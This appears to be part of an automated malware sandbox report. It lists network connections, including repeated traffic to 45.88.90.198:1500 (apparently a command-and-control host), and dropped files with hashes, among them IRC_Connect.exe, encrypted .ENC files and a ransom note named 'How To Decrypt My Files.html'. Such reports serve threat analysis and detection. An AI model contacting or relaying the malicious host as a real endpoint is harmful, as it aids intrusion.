| NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| NL | 23.62.61.162:443 | metadata.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.17:443 | binaries.templates.cdn.office.net | tcp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| DE | 45.88.90.198:1500 | tcp | |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3364-0-0x00007FF9312F3000-0x00007FF9312F5000-memory.dmp
memory/3364-2-0x000002487A550000-0x000002487A572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklefe0i.0xb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3364-10-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-12-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-11-0x000002487AA80000-0x000002487AAC6000-memory.dmp
memory/3364-13-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.cmdline
| MD5 | bf5eb993de95591cac9f7cb2cb129d55 |
| SHA1 | d1d1b89e12a30e45378dc561d6b235017c446ae6 |
| SHA256 | 5a872a56c206f1d8522ca30175ba0d8e782f8a54888b54da0235b1dd3ab31f64 |
| SHA512 | bce3cb86e340e1c77073107dabef1ed758723721741663a4387f845eb94a372240d932126183110cfd0ae44d062272c7398e84c62972e430ccdbe609c798644c |
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.0.cs
| MD5 | 60c0d4aebef0d650d89729e1bf02de63 |
| SHA1 | 4f1499e94be62af8a4ece3a8c505b3766c338ff7 |
| SHA256 | 0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799 |
| SHA512 | 9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a |
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\CSCA34A7BD2B97740449C58EA6BA518F6C.TMP
| MD5 | 8bd4989c6432a186e9b39f94bb1c3d2a |
| SHA1 | ceb5fb53c3739f9a94423baf44308f3f8d61dc31 |
| SHA256 | a9dfb58eef5242cb72d09de9931e6cc70ad86c2e6ed8ecaa9444e255c101d4b1 |
| SHA512 | 171d964951984147fa0f4e8dc8769b9d126e8297eb3082d80dd6e93d7b606c38d29128a56a89a82075d669eeb463e714821a96ce2f80547da6c6efb15121aac5 |
C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp
| MD5 | 65efb3e7a992c7a926c6415de45c6055 |
| SHA1 | ee94047f341f8c6650010ebb4d4611cbe8262ccc |
| SHA256 | cd9546051c4bbd811f90bca7cca9c73ffd7cacdb06c85eef254f1c751390e1c2 |
| SHA512 | c29daed924083881e00e36d2e53a4a070a10240ea8b5155aebd19e9719521c344e5b35da4f9cc355c654d7ac3be6ac2eb6b426e9fc2010a91fa0c04bc12cd4a9 |
memory/3364-26-0x000002487A5C0000-0x000002487A5C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.dll
| MD5 | 4cd57d4b348d5d1cef73aabc345c2697 |
| SHA1 | 52b9fae1d81c3fce91e2ce047304e951760c5a83 |
| SHA256 | b59df65adb579d687d4e2ba88c1dd1555a9041a4957f1ffd619665673ff999f2 |
| SHA512 | 79dc31edb29a5cf341f41b17730efce5458fe0b1724223c0116a37f8f511018a8641dc7b0b9cfdbf6d0eb656a38970d6eb04ae5c9bffa0c0702a45b6d774c815 |
C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe
| MD5 | e6e056cf4fc25dd7551447172e5338dc |
| SHA1 | 9b88a0cccadd7ae7588f76416987d58ca519a082 |
| SHA256 | 4959d4eb5c0abcb1c05df1b9de000ce34d61308debdff79f3bcac3ac3b0d0e7b |
| SHA512 | 2e72302f479c1fed3ed539e6d8c00dd278f07676b27c3db26afdb7a1a2e60523c51d82b4d75649f21b4644742ab029b9675e27e07237ce015c52518e87b5a44f |
memory/2308-39-0x0000000000BD0000-0x0000000000BE8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0a4a3b9a52b8fe3b019f6cd0ef3dad6 |
| SHA1 | fed70ce7834c3b97edbd078eccda1e5effa527cd |
| SHA256 | 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31 |
| SHA512 | 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
memory/3364-86-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-87-0x00007FF9312F3000-0x00007FF9312F5000-memory.dmp
memory/3364-88-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-93-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/2308-95-0x0000000001310000-0x000000000131C000-memory.dmp
memory/2308-96-0x000000001D210000-0x000000001D24A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp8C2E.tmp
| MD5 | 1b942faa8e8b1008a8c3c1004ba57349 |
| SHA1 | cd99977f6c1819b12b33240b784ca816dfe2cb91 |
| SHA256 | 555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc |
| SHA512 | 5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43 |
memory/4596-101-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-103-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-104-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-102-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-105-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-106-0x00007FF90F630000-0x00007FF90F640000-memory.dmp
memory/4596-107-0x00007FF90F630000-0x00007FF90F640000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | b5f1ca34014057b0885ccbf67fc12b52 |
| SHA1 | d105c94f6755e7ea539f3f2e303ef9141fa57bbb |
| SHA256 | ce95618eafd141e5bcc66d74966c6eb07dd882273fb6fde0b1a3fb082cfb6f1e |
| SHA512 | 50c2ad6679088acf2763c089f68feb0042d5a70537221fe73f42571689f4ff8bdd2d4f1a00a773210fe6483245d325486e06cf94dca692938e44d16fdd5fbff3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WindowSC.exe.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 2327458efd2d21654586727c1ee95704 |
| SHA1 | ff90ba50f34f05acf5a20159f19fdac9da15d3c1 |
| SHA256 | 89c52bf16b984aa076a03007f8215156eb5d4e49584e1258ac84a1aa5a448ea7 |
| SHA512 | 2cf5a33858bbd839c6a77fed0179d9a073b07e7e857133c7d005d39950931e41145f60e08e4f583cf67eccc2a3f0133753b5732792c949ac7d95a0b14bda2914 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 1a1ef3e2028e3240f5573849de53795f |
| SHA1 | b1d8a2b385374c51d204cbcff3e49dd065817478 |
| SHA256 | e389d5cfc3b3edf2295100aecbe562853f0526bc268628551e1bfa48b56deefe |
| SHA512 | 9a37eb6e0cc07ebafd25189f2ded73a556e5ed015b71c23843b237acd25e759517b21f3d1a7651e72544ce887319c3405b8f58e07c3dccae2fad97619d65d8f9 |
C:\Users\Admin\AppData\Local\Temp\TCDEF3F.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/2308-642-0x000000001CF80000-0x000000001CF8C000-memory.dmp
C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | d70601e34114dc7b5efd7c8e185f92e6 |
| SHA1 | c56c9b0ffae0b6239d3a2a8a4e0b65590fb8b7a2 |
| SHA256 | a837d92a1fd005992ed3c365821a9c0909621f16a84f650eec66bf7e7e6d4ac8 |
| SHA512 | 505df82c93e14e39fbc413a5f7825aec77c796a9baa6fbb7a4058343a193e93e731a11ef322ae14097c8d525072e0171cf4599ab0578a418e82159576d7b1ceb |
C:\Users\Admin\Desktop\~$w Microsoft Word Document.docx
| MD5 | a497bbe916a069ed592599a6fc2f348e |
| SHA1 | a5d6c4bd11f04a91adcf65686ed952a103d03240 |
| SHA256 | ae4148eb3b8b47cdb70e101d042fdaf718955b2046cf467a2cb15625a4a10df3 |
| SHA512 | d3333b014910cab74ec6f3defdb2a7bf07f153befd38dd517dda9d4878316b93a15ee790e9fb0a2aad833366a36d86cab03b6f6a75485d8f92efbf700a6dbcbf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | bdf3e009c72d4fe1aa9a062e409d68f6 |
| SHA1 | 7c7cc29a19adb5aa0a44782bb644575340914474 |
| SHA256 | 8728752ef08d5b17d7eb77ed69cfdd1fc73b9d6e27200844b0953aeece7a7fdc |
| SHA512 | 75b85a025733914163d90846af462124db41a40f1ce97e1e0736a05e4f09fe9e78d72316753317dabea28d50906631f634431a39384a332d66fa87352ff497f8 |
\??\pipe\LOCAL\crashpad_8_WQRSEGQXVXJQDUCU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7c16971be0e6f1e01725260be0e299cd |
| SHA1 | e7dc1882a0fc68087a2d146b3a639ee7392ac5ed |
| SHA256 | b1fa098c668cdf8092aa096c83328b93e4014df102614aaaf6ab8dc12844bdc0 |
| SHA512 | dc76816e756d27eedc2fe7035101f35d90d54ec7d7c724ad6a330b5dd2b1e6d108f3ae44cedb14a02110157be8ddac7d454efae1becebf0efc9931fdc06e953c |
C:\Users\Admin\Desktop\How To Decrypt My Files.html
| MD5 | d2dbbc3383add4cbd9ba8e1e35872552 |
| SHA1 | 020abbc821b2fe22c4b2a89d413d382e48770b6f |
| SHA256 | 5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be |
| SHA512 | bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 36e2d52cfb9e312a186d90a89069ea4e |
| SHA1 | ca132e03a5523600f85053d79a116c0e35cf0e6b |
| SHA256 | e94ac13b54012f3f66b69b78cfb118f06fc540a34ec6a9ee2e066b32a4ca5e0f |
| SHA512 | 966ac12de2448aa365d24ddb821d7ee5679e8770f7ac129539d091fab8430bfa1e32c5c0eeb03387b56b17bfeceabdfbcb9230c5b141d8f3936ab9c8a9245294 |
C:\Users\Admin\AppData\Roaming\Microsoft\Word\AutoRecovery save of New Microsoft Word Document.asd
| MD5 | dbff52897506b862c4f47c7f779a72c1 |
| SHA1 | 23bd2d7045fff2f07c11de95df6833c1463e347d |
| SHA256 | 8c7b1000d1f4837fea20643d92ab0fcb083c27ad3bc55a5c2e460a74543f3949 |
| SHA512 | 25d6a16a815dfa727ead465e7cf0251abf6350ab6f393b4a96e9aa3f6e8ede0c8bfbe9a9e079748ac76ba02518e8f1ef0cc79b869e8f3fc410358a54af5dfc57 |
memory/4596-871-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-874-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-873-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-872-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3a35da1155a803454dd67eff5cd7f812 |
| SHA1 | 98df3e4b56231b8ea2f7391738696adb88cac386 |
| SHA256 | 543db03fbbfb3aeafa635637cf1964453d7772202b0c25231deaa01aa6dd10a7 |
| SHA512 | 475cda79584b4508e6b15e1254174d798f01033300f2d0e03d726769044521502b734b71b5104aa9fa355358c581e6483dea6460b3b39bf7fe7bc9ca99cb94a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7505ce37bbac294980cc56b8eb427788 |
| SHA1 | 866377f201b4cb06014f27eed21a3c76f2fe97e3 |
| SHA256 | 2b7c82435b5088d033e60fe65a39c16bc7bba1285e68f633cb433c8b6b96259d |
| SHA512 | aed228d45d26c68bc17de642917bc69f1a5603dcbb4b29e70bcd7820d14492af4a715f7d0429e8893a731663fbb0a43462d12326ef28e783f36f836b8a59cd4c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a4d7cc9ef054be890ecf659dccc40446 |
| SHA1 | 2415ab272e8207611ca4196f8bd4e5cf8c55d35d |
| SHA256 | a25b4b343c26f144fddb71d312798bb2f5c4120678bf7b5368f9536e9ebebb2a |
| SHA512 | 0152499fb508e4c1d75873f8ae9cea5db83171d3543623e24c9c61c4e30ba0bc7cd55942989a9bee241efb3114537fa7148348111e615ec4c9cdbbd6579fa6aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c26aaf4f063fd348aec25d9bb83a1491 |
| SHA1 | 4d3b43d4e7d5c3a81947ce8429fef3653ac07759 |
| SHA256 | 4e6d7ada41a47f46781e31da063678166bb8243bb5046cba3fddc6456e6dab20 |
| SHA512 | b30c5e5ea2aa70508697e292bde1293ac8ac811d5afc696653c05fa279e654a2aae50077e116e0e43b516c0226720440d23007929afec73e6c7010eec7cd8b5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
memory/2308-1483-0x000000001C1A0000-0x000000001C250000-memory.dmp
memory/2308-1484-0x000000001F990000-0x000000001FEB8000-memory.dmp
memory/2308-1485-0x000000001D380000-0x000000001D40E000-memory.dmp
memory/2308-1489-0x000000001C450000-0x000000001C458000-memory.dmp
memory/2308-1490-0x000000001C350000-0x000000001C35A000-memory.dmp
memory/2308-1491-0x000000001C360000-0x000000001C36E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a0490168f1e6406fd416f4a83181e02 |
| SHA1 | 8c32007b782f879b8c5ae90455306e9ea535a2aa |
| SHA256 | 2281a3c2a0985c153806ec9845f38e3e4c8dd5725fc1596732c4cfa457e30472 |
| SHA512 | 235fe82c16ac3e9bfcae1ff8ba26eaddee72a8e65ecf8e60bc182c80e10b1436b45495b164e4cdc9d8a1ef46600a632f1f134f85b741e65e0886aec3a3c10600 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | e566632d8956997225be604d026c9b39 |
| SHA1 | 94a9aade75fffc63ed71404b630eca41d3ce130e |
| SHA256 | b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0 |
| SHA512 | f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd |
C:\Users\Admin\Desktop\desktop.ini
| MD5 | 9e36cc3537ee9ee1e3b10fa4e761045b |
| SHA1 | 7726f55012e1e26cc762c9982e7c6c54ca7bb303 |
| SHA256 | 4b9d687ac625690fd026ed4b236dad1cac90ef69e7ad256cc42766a065b50026 |
| SHA512 | 5f92493c533d3add10b4ce2a364624817ebd10e32daa45ee16593e913073602db5e339430a3f7d2c44abf250e96ca4e679f1f09f8ca807d58a47cf3d5c9c3790 |
memory/2308-1516-0x000000001BC60000-0x000000001BC76000-memory.dmp
memory/2976-1517-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2976-1518-0x0000000005720000-0x00000000057B2000-memory.dmp
memory/2976-1519-0x0000000005860000-0x00000000058FC000-memory.dmp
memory/2976-1520-0x0000000005EB0000-0x0000000006456000-memory.dmp
memory/2976-1521-0x0000000005A00000-0x0000000005A66000-memory.dmp
memory/1020-1522-0x00000000028D0000-0x0000000002906000-memory.dmp
memory/1020-1523-0x00000000050A0000-0x00000000056CA000-memory.dmp
memory/1020-1524-0x0000000004EE0000-0x0000000004F02000-memory.dmp
memory/1020-1525-0x0000000004F90000-0x0000000004FF6000-memory.dmp
memory/1020-1534-0x0000000005890000-0x0000000005BE7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3cc20b7ec349eb8667d2626f5fefb5b7 |
| SHA1 | f0f95ba2de788c9359a5ca527f7218e6b4c93ae2 |
| SHA256 | 50cdfceac0d03c9faad8cf23e7b48969b572d3bf50ae1f2ac24ec244107865b7 |
| SHA512 | d5a74ea6678569292273ca876938cf4f3e411b5638119cf9335e0331b3ea79749ee0dc1506e37216fb17aee739d49f9137c32e323f22fd7b4150d7bef5f010b2 |
memory/1020-1536-0x0000000005DA0000-0x0000000005DBE000-memory.dmp
memory/1020-1537-0x0000000005DC0000-0x0000000005E0C000-memory.dmp
C:\Users\Admin\Documents\desktop.ini
| MD5 | ecf88f261853fe08d58e2e903220da14 |
| SHA1 | f72807a9e081906654ae196605e681d5938a2e6c |
| SHA256 | cafec240d998e4b6e92ad1329cd417e8e9cbd73157488889fd93a542de4a4844 |
| SHA512 | 82c1c3dd163fbf7111c7ef5043b009dafc320c0c5e088dec16c835352c5ffb7d03c5829f65a9ff1dc357bae97e8d2f9c3fc1e531fe193e84811fb8c62888a36b |
C:\Users\Admin\Videos\desktop.ini
| MD5 | 50a956778107a4272aae83c86ece77cb |
| SHA1 | 10bce7ea45077c0baab055e0602eef787dba735e |
| SHA256 | b287b639f6edd612f414caf000c12ba0555adb3a2643230cbdd5af4053284978 |
| SHA512 | d1df6bdc871cacbc776ac8152a76e331d2f1d905a50d9d358c7bf9ed7c5cbb510c9d52d6958b071e5bcba7c5117fc8f9729fe51724e82cc45f6b7b5afe5ed51a |
C:\Users\Admin\OneDrive\desktop.ini
| MD5 | c193d420fc5bbd3739b40dbe111cd882 |
| SHA1 | a60f6985aa750931d9988c3229242f868dd1ca35 |
| SHA256 | e5bfc54e8f2409eba7d560ebe1c9bb5c3d73b18c02913657ed9b20ae14925adc |
| SHA512 | d983334b7dbe1e284dbc79cf971465663ca29cec45573b49f9ecdb851cdb6e5f9a6b49d710a1553bdae58c764887c65ba13fd75dfdd380c5c9ef9c0024aa3ef0 |
C:\Users\Admin\Downloads\desktop.ini
| MD5 | 3a37312509712d4e12d27240137ff377 |
| SHA1 | 30ced927e23b584725cf16351394175a6d2a9577 |
| SHA256 | b029393ea7b7cf644fb1c9f984f57c1980077562ee2e15d0ffd049c4c48098d3 |
| SHA512 | dbb9abe70f8a781d141a71651a62a3a743c71a75a8305e9d23af92f7307fb639dc4a85499115885e2a781b040cbb7613f582544c2d6de521e588531e9c294b05 |
C:\Users\Admin\Music\desktop.ini
| MD5 | 06e8f7e6ddd666dbd323f7d9210f91ae |
| SHA1 | 883ae527ee83ed9346cd82c33dfc0eb97298dc14 |
| SHA256 | 8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68 |
| SHA512 | f7646f8dcd37019623d5540ad8e41cb285bcc04666391258dbf4c42873c4de46977a4939b091404d8d86f367cc31e36338757a776a632c7b5bf1c6f28e59ad98 |
C:\Users\Admin\Pictures\desktop.ini
| MD5 | 29eae335b77f438e05594d86a6ca22ff |
| SHA1 | d62ccc830c249de6b6532381b4c16a5f17f95d89 |
| SHA256 | 88856962cef670c087eda4e07d8f78465beeabb6143b96bd90f884a80af925b4 |
| SHA512 | 5d2d05403b39675b9a751c8eed4f86be58cb12431afec56946581cb116b9ae1014ab9334082740be5b4de4a25e190fe76de071ef1b9074186781477919eb3c17 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 8eec1c32ccfdf04a626741c4e574fd33 |
| SHA1 | 69b2a56665bcba4a7cee36dcd3d55904ed34ec6c |
| SHA256 | a5cb3408804d62fc968c43ea77526636c2647a6afc6a8883bf444e9be4df8fe6 |
| SHA512 | e6994f8307e6ed3f1be053d18d439b7a0cee0b93ffb4402c0317a49ac5bcedb97f4164d9f65d7b38d1e2782096298882dd1de53177e481252699dbc7881e12e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 00771d6aeaf300675ebe33da31f77120 |
| SHA1 | ed9318fb80f251605d84b8599c1e336c421c5df9 |
| SHA256 | b35fb2332c8f53593be29ef5cb5ec258afae261f6f7947a28cca1e193f098f51 |
| SHA512 | ba8455f3e477250c552ac1f5f28041fda0596b0441557f7de1b162dc27e351f2562ff22558910a08614d8487d43ab88353a2b9f5a2f422fb91cd5d1e9295c586 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
| MD5 | a397e5983d4a1619e36143b4d804b870 |
| SHA1 | aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4 |
| SHA256 | 9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4 |
| SHA512 | 4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | c67aca171f989bdbd5bbec4f3362aad4 |
| SHA1 | 70cafa292b4336443301006f8c52e4d601b690d1 |
| SHA256 | 2ccb531bffd651a1e09825677ff8850d6b1e2377ee7952ead4ff0f44436e4b46 |
